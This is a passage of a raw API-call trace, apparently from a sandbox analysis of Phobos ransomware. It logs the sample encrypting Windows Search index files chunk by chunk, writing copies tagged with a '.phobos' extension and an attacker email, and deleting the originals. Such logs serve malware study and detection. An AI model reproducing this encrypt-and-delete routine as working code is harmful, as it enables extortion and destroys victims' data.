(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.605] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.605] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.605] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0174.605] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.605] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x100000, lpOverlapped=0x0) returned 1 [0174.723] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x100010, dwBufLen=0x100010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x100010) returned 1 [0174.731] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x100010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x100010, lpOverlapped=0x0) returned 1 [0174.759] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0174.759] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.759] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0174.759] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.759] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0174.759] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.759] CloseHandle (hObject=0x17c) returned 1 [0174.759] CloseHandle (hObject=0x14c) returned 1 [0174.759] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs")) returned 1 [0174.776] SetEvent (hEvent=0xe8) returned 1 [0174.776] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.787] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0174.787] CloseHandle (hObject=0x138) returned 1 [0174.787] SetEvent (hEvent=0xe8) returned 1 [0174.787] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.787] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.788] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=240) returned 1 [0174.788] CloseHandle (hObject=0x138) returned 1 [0174.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000")) returned 0x2020 [0174.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0174.788] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.788] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.788] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0174.791] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.791] ReadFile (in: hFile=0x138, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf0, lpOverlapped=0x0) returned 1 [0174.791] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x100, dwBufLen=0x100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x100) returned 1 [0174.791] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x100, lpOverlapped=0x0) returned 1 [0174.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0174.792] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.792] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0174.792] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.792] WriteFile (in: hFile=0x148, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0174.792] CryptDestroyKey (hKey=0xa32be8) returned 1 [0174.792] CloseHandle (hObject=0x138) returned 1 [0174.792] CloseHandle (hObject=0x148) returned 1 [0174.793] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.000")) returned 1 [0174.793] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.001" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0174.794] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0174.794] CloseHandle (hObject=0x148) returned 1 [0174.794] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.863] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0174.863] CloseHandle (hObject=0x14c) returned 1 [0174.863] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.863] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0174.863] CloseHandle (hObject=0x14c) returned 1 [0174.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002")) returned 0x2020 [0174.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.864] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.864] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.864] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.864] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0174.867] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.867] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10000, lpOverlapped=0x0) returned 1 [0175.027] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010) returned 1 [0175.027] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10010, lpOverlapped=0x0) returned 1 [0175.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0175.029] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.029] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0175.029] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.029] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0175.029] CryptDestroyKey (hKey=0xa327e8) returned 1 [0175.029] CloseHandle (hObject=0x14c) returned 1 [0175.029] CloseHandle (hObject=0x17c) returned 1 [0175.029] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\INDEX.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\index.002")) returned 1 [0175.030] SetEvent (hEvent=0xe8) returned 1 [0175.031] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0175.031] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.031] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0175.031] CloseHandle (hObject=0x17c) returned 1 [0175.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002")) returned 0x2020 [0175.031] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.031] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.031] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.031] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.031] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0175.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0175.032] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.032] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10000, lpOverlapped=0x0) returned 1 [0175.185] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010) returned 1 [0175.186] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10010, lpOverlapped=0x0) returned 1 [0175.188] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0175.188] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.188] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0175.188] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.188] WriteFile (in: hFile=0x14c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0175.188] CryptDestroyKey (hKey=0xa327e8) returned 1 [0175.188] CloseHandle (hObject=0x17c) returned 1 [0175.188] CloseHandle (hObject=0x14c) returned 1 [0175.188] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\CiPT0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\propmap\\cipt0000.002")) returned 1 [0175.189] SetEvent (hEvent=0xe8) returned 1 [0175.191] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0175.191] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.658] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=65536) returned 1 [0175.658] CloseHandle (hObject=0x194) returned 1 [0175.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002")) returned 0x2020 [0175.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.658] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.658] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.659] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0175.659] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.659] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10000, lpOverlapped=0x0) returned 1 [0175.746] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010, dwBufLen=0x10010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10010) returned 1 [0175.747] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10010, lpOverlapped=0x0) returned 1 [0175.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0175.748] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.748] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0175.748] CryptDestroyKey (hKey=0xa32c68) returned 1 [0175.748] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0175.748] 